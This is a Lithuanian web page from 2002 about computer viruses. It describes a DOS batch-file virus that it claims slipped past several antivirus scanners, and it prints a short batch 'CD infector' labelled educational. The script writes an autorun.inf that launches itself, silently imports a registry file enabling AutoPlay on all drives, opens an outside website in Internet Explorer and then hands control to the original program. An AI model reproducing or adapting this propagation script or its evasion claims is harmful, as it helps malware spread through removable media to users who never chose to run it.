Siame skyriuje ieskokite informacijos apie virusus ir kaip nuo ju apsisaugoti.

DOS komandiniu bylu virusas

27 03 2002

Programos teksta ziurekite cia. Siame pavyzdyje parodoma, kaip galima panaudoti DOS komandines bylas virusu kurimui. Sio teksto rasymo metu, sio viruso neaptiko AVP, heuristinis mechanizmas netgi neisduoda jokiu pranesimu, kad bylos veikla itartina*. Pavyzdys turi visas dalis, budingas EXE ir COM virusams (zr. komentarus). Nors sis komandines bylos fragmentas yra palyginus nepavojingas, nebandykite leisti savo ar kitu zmoniu kompiuteriuose ir keisti programos teksta, iki galo neissiaiskine kaip viskas veikia. Virusu kurimas, tai is esmes, numatymas tolimesniu ju vystimosi tendenciju ir tuo paciu, kelio ju platinimuisi uzkirtimas ateityje.

*28 03 2002 gautas pranesimas, kad DrWeb atpazista byla, kaip itartina.
*29 03 2002 Hotmail automatinis prisegtu bylu skaneris - Virus not found. Naudoja McAfee AV.

Autorun.inf bylu infektorius

Sis DOS komandines bylos fragmentas parodo, kaip virusai gali platintis per CD panaudodamas AutoPlay galimybe, atsiradusia Windows 95 OS versijoje ir palaikoma visose velesnese.

:: CD infector by NoTrust, educational purposes only
:: pries tai turi buti realizuotas paieskos mechanizmas
@echo off
> autorun.inf echo [autorun]
>> autorun.inf echo open=%0
echo byla autorun.inf sukurta!
c:
regedit /s a:\autoplay.reg
cd c:\
c:\progra~1\intern~1\iexplore flamebox.narod.ru
:: valdymas perduodamas originaliai programai
autorun.exe
exit

Byla autoplay.reg rasite cia. hex:00,00,00,00 reiskia, kad visu irenginiu AytoPlay savybe ijungta.

Daugiau apie bylos autorun.inf panaudojima skaitykite kaip padaryti CD automatini paleidimo meniu.